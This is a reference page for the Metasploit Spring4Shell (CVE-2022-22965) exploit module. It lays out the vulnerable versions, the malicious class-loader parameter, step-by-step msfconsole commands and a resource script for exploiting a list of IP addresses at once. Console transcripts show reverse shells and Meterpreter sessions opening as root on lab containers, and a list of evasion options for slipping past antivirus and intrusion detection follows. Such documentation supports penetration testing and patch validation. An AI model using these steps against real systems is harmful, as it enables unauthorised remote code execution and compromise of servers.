Spring Framework Class property RCE (Spring4Shell) - Metasploit
This page contains detailed information about how to use the exploit/multi/http/spring_framework_rce_spring4shell metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Spring Framework Class property RCE (Spring4Shell)
Module: exploit/multi/http/spring_framework_rce_spring4shell
Source code: modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
Disclosure date: 2022-03-31
Last modification time: 2022-05-13 09:16:01 +0000
Supported architecture(s): -
Supported platform(s): Linux, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-22965
This module is also known as Spring4Shell or SpringShell.
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
Using spring_framework_rce_spring4shell against a single host
Normally, you can use exploit/multi/http/spring_framework_rce_spring4shell this way:
msf > use exploit/multi/http/spring_framework_rce_spring4shell
msf exploit(spring_framework_rce_spring4shell) > show targets
... a list of targets ...
msf exploit(spring_framework_rce_spring4shell) > set TARGET target-id
msf exploit(spring_framework_rce_spring4shell) > show options
... show and set options ...
msf exploit(spring_framework_rce_spring4shell) > exploit
Using spring_framework_rce_spring4shell against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your spring_framework_rce_spring4shell will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/multi/http/spring_framework_rce_spring4shell")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.
Verification Steps
- Build the application
git clone https://github.com/vleminator/Spring4Shell-POC
docker build . -t spring4shell
- Run the application
docker run -p 8085:8080 spring4shell
- Start msfconsole
- Run:
use exploit/multi/http/spring_framework_rce_spring4shell
- Set the
RHOSTS
,TARGET
,PAYLOAD
and payload associated datastore options - Run the exploit
Options
HTTP_METHOD
HTTP method to use for checking and exploitation. If set to Automatic
(the default value), the method will be
automatically identified. Automatically identifying the HTTP method uses the check method.
PAYLOAD_PATH
Path to write the payload. This is relative to the tomcat installation directory.
Scenarios
Target Java (vulhub container)
The target is the vulhub container which uses the GET HTTP method.
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP_METHOD Automatic no HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH webapps/ROOT yes Path to write the payload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The path to the application action
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8080/
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: GET
[*] 192.168.159.128:8080 - Generating JSP...
[*] 192.168.159.128:8080 - Modifying Class Loader...
[*] 192.168.159.128:8080 - Waiting for the server to flush the logfile
[*] 192.168.159.128:8080 - Executing JSP payload at http://192.168.159.128:8080/MUpts6425.jsp
[+] 192.168.159.128:8080 - Log file flushed
[*] Command shell session 1 opened (192.168.250.134:4444 -> 172.19.0.2:47418 ) at 2022-05-05 10:47:50 -0400
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat
Target Linux (x64)
The target is the vleminator container which uses the POST HTTP method.
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP_METHOD Automatic no HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH webapps/ROOT yes Path to write the payload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /app/example/HelloWorld.action yes The path to the application action
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8085/helloworld/greeting
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: POST
[*] 192.168.159.128:8085 - Generating JSP...
[*] 192.168.159.128:8085 - Modifying Class Loader...
[*] 192.168.159.128:8085 - Waiting for the server to flush the logfile
[*] 192.168.159.128:8085 - Executing JSP payload at http://192.168.159.128:8085/S0J17.jsp
[+] 192.168.159.128:8085 - Log file flushed
[*] Sending stage (3020772 bytes) to 172.17.0.2
[+] Deleted /tmp/6DKA
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:54902 ) at 2022-05-05 10:52:35 -0400
meterpreter > getuid
Server username: root
meterpreter > pwd
/helloworld
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Debian 11.2 (Linux 5.17.4-100.fc34.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the multi/http/spring_framework_rce_spring4shell exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show info
Name: Spring Framework Class property RCE (Spring4Shell)
Module: exploit/multi/http/spring_framework_rce_spring4shell
Platform: Linux, Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2022-03-31
Provided by:
vleminator <[email protected]>
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Java
1 Linux
2 Windows
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP_METHOD Automatic no HTTP method to use (Accepted: Automatic, GET
, POST)
PAYLOAD_PATH webapps/ROOT yes Path to write the payload
Proxies no A proxy chain of format type:host:port[,type
:host:port][...]
RHOSTS yes The target host(s), see https://github.com/r
apid7/metasploit-framework/wiki/Using-Metasp
loit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /app/example/HelloWorld.a yes The path to the application action
ction
VHOST no HTTP server virtual host
Payload information:
Space: 5000
Description:
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and
older versions when running on JDK 9 or above and specifically
packaged as a traditional WAR and deployed in a standalone Tomcat
instance are vulnerable to remote code execution due to an unsafe
data binding used to populate an object from request parameters to
set a Tomcat specific ClassLoader. By crafting a request to the
application and referencing the
org.apache.catalina.valves.AccessLogValve class through the
classLoader with parameters such as the following:
class.mod ule.classLoader.resources.context.parent.pipeline.first.suffix=.jsp,
an unauthenticated attacker can gain remote code execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-22965
https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://github.com/spring-projects/spring-framework/issues/28261
https://tanzu.vmware.com/security/cve-2022-22965
Also known as:
Spring4Shell
SpringShell
Module Options
This is a complete list of options available in the multi/http/spring_framework_rce_spring4shell exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP_METHOD Automatic no HTTP method to use (Accepted: Automatic, GE
T, POST)
PAYLOAD_PATH webapps/ROOT yes Path to write the payload
Proxies no A proxy chain of format type:host:port[,typ
e:host:port][...]
RHOSTS yes The target host(s), see https://github.com/
rapid7/metasploit-framework/wiki/Using-Meta
sploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /app/example/HelloWorld.a yes The path to the application action
ction
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.126 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java
Advanced Options
Here is a complete list of advanced options supported by the multi/http/spring_framework_rce_spring4shell exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show advanced
Module advanced options (exploit/multi/http/spring_framework_rce_spring4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possi
bility of cleaning up files
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains c
ontext information
DOMAIN WORKSTATION yes The domain to use for Windows authen
tication
DigestAuthIIS true no Conform to IIS, should work for most
servers. Only set to false for non-
IIS servers
DisablePayloadHandler false no Disable the handler code for the sel
ected payload
EXE::Custom no Use custom exe instead of automatica
lly generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of re
gular payload exe
EXE::FallBack false no Use the default template in case the
specified one is missing
EXE::Inject false no Set to preserve the original EXE fun
ction
EXE::OldMethod false no Set to use the substitution EXE gene
ration method.
EXE::Path no The directory in which to look for t
he executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding
payloads
FileDropperDelay no Delay in seconds before attempting c
leanup
FingerprintCheck true no Conduct a pre-exploit fingerprint ve
rification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for aut
hentication
HttpRawHeaders no Path to ERB-templatized raw headers
to append to existing headers
HttpTrace false no Show the raw HTTP requests and respo
nses
HttpTraceColors red/blu no HTTP request and response colors for
HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for aut
hentication
MSI::Custom no Use custom msi instead of automatica
lly generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of re
gular payload msi
MSI::Path no The directory in which to look for t
he msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (ele
vation to SYSTEM if accepted)
SSLServerNameIndicatio no SSL/TLS Server Name Indication (SNI)
n
SSLVersion Auto yes Specify the version of SSL/TLS to be
used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (iPad; CPU no The User-Agent header to use for all
OS 15_3_1 like Mac OS requests
X) AppleWebKit/605.1.
15 (KHTML, like Gecko)
Version/15.2 Mobile/1
5E148 Safari/604.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this modul
e
WfsDelay 2 no Additional delay in seconds to wait
for a session
WritableDir /tmp yes A directory where we can write files
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specifi
ed. Connect back will NOT go through proxy
but directly to LHOST
ReverseListenerBindAdd no The specific IP address to bind to on the l
ress ocal system
ReverseListenerBindPor no The port to bind to on the local system if
t different from LPORT
ReverseListenerComm no The specific communication channel to use f
or this listener
ReverseListenerThreade false yes Handle every connection in a new thread (ex
d perimental)
StagerRetryCount 10 no The number of times the stager should retry
if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager be
tween reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/spring_framework_rce_spring4shell module can exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show targets
Exploit targets:
Id Name
-- ----
0 Java
1 Linux
2 Windows
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/spring_framework_rce_spring4shell exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
5 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/spring_framework_rce_spring4shell exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_ca false no Use random casing for the HTTP method
se
HTTP::method_random_in false no Use a random invalid, HTTP method for reque
valid st
HTTP::method_random_va false no Use a random, but valid, HTTP method for re
lid quest
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP r
equest
HTTP::pad_fake_headers 0 no How many fake headers to insert into the HT
_count TP request
HTTP::pad_get_params false no Insert random, fake query string variables
into the request
HTTP::pad_get_params_c 16 no How many fake query string variables to ins
ount ert into the request
HTTP::pad_method_uri_c 1 no How many whitespace characters to use betwe
ount en the method and uri
HTTP::pad_method_uri_t space no What type of whitespace to use between the
ype method and uri (Accepted: space, tab, apach
e)
HTTP::pad_post_params false no Insert random, fake post variables into the
request
HTTP::pad_post_params_ 16 no How many fake post variables to insert into
count the request
HTTP::pad_uri_version_ 1 no How many whitespace characters to use betwe
count en the uri and version
HTTP::pad_uri_version_ space no What type of whitespace to use between the
type uri and version (Accepted: space, tab, apac
he)
HTTP::uri_dir_fake_rel false no Insert fake relative directories into the u
ative ri
HTTP::uri_dir_self_ref false no Insert self-referential directories into th
erence e uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-no
rmal, hex-noslashes, hex-random, hex-all, u
-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../
../)
HTTP::uri_fake_params_ false no Add a fake start of params to the URI (eg:
start /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslas false no Use back slashes instead of forward slashes
hes in the uri
HTTP::version_random_i false no Use a random invalid, HTTP version for requ
nvalid est
HTTP::version_random_v false no Use a random, but valid, HTTP version for r
alid equest
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Seems the payload hasn't been written
Here is a relevant code snippet related to the "Seems the payload hasn't been written" error message:
141: })
142:
143: res&.code == 200 && !res.body.blank?
144: end
145:
146: fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded
147:
148: print_good("#{peer} - Log file flushed")
149: end
150:
151: # Fix the JSP payload to make it valid once is dropped
Web server seems unresponsive
Here is a relevant code snippet related to the "Web server seems unresponsive" error message:
203: res = send_request_cgi(
204: 'method' => 'POST',
205: 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
206: )
207:
208: return CheckCode::Unknown('Web server seems unresponsive') unless res
209:
210: if res.headers.key?('Server')
211: res.headers['Server'].match(%r{(.*)/([\d|.]+)$})
212: else
213: res.body.match(%r{Apache\s(.*)/([\d|.]+)})
Application does not seem to be running under Tomcat
Here is a relevant code snippet related to the "Application does not seem to be running under Tomcat" error message:
214: end
215:
216: server = Regexp.last_match(1) || nil
217: version = Rex::Version.new(Regexp.last_match(2)) || nil
218:
219: return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)
220:
221: vprint_status("Detected #{server} #{version} running")
222:
223: if datastore['HTTP_METHOD'] == 'Automatic'
224: # prefer POST over get to keep the vars out of the query string if possible
Failed to automatically identify the HTTP method
Here is a relevant code snippet related to the "Failed to automatically identify the HTTP method" error message:
254: http_method = datastore['HTTP_METHOD']
255: if http_method == 'Automatic'
256: # if the check was skipped but we need to automatically identify the method, we have to run it here
257: @checkcode = check if @checkcode.nil?
258: http_method = @checkcode.details[:method]
259: fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?
260:
261: print_good("Automatically identified HTTP method: #{http_method}")
262: end
263:
264: # if the check method ran automatically, add a short delay before continuing with exploitation
<PEER> - No answer
Here is a relevant code snippet related to the "<PEER> - No answer" error message:
280: suffix: '.jsp',
281: file_date_format: date_format
282: }
283: res = modify_class_loader(http_method, properties)
284: unless res
285: fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
286: end
287:
288: # No matter what happened, try to 'restore' the Class Loader
289: properties = {
290: payload: '',
Go back to menu.
Related Pull Requests
- #16621 Merged Pull Request: Fix timeout of duplicated sessions
- #16622 Merged Pull Request: Bump Metasploit framework version to 6.2.0
- #16620 Merged Pull Request: Bump RubySMB, Add File Server Tool
- #16619 Merged Pull Request: fix of improper neighbor advertisement filtering in ipv6_neighbor.rb
- #16488 Merged Pull Request: Windows Task Scheduler Mixin &
persistence_exe
andvss_persistence
module update - #16413 Merged Pull Request: Multiple local exploit suggester enhancements
- #16610 Merged Pull Request: New, All-Inclusive PrintNightmare Exploit
- #16608 Merged Pull Request: Rename wiki files
References
- CVE-2022-22965
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
- https://github.com/spring-projects/spring-framework/issues/28261
- https://tanzu.vmware.com/security/cve-2022-22965
See Also
Check also the following modules related to this module:
- exploit/multi/http/spring_cloud_function_spel_injection
- exploit/linux/http/spring_cloud_gateway_rce
- auxiliary/scanner/http/springcloud_directory_traversal
- auxiliary/scanner/http/springcloud_traversal
- exploit/linux/http/mida_solutions_eframework_ajaxreq_rce
Authors
- vleminator <vleminator[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.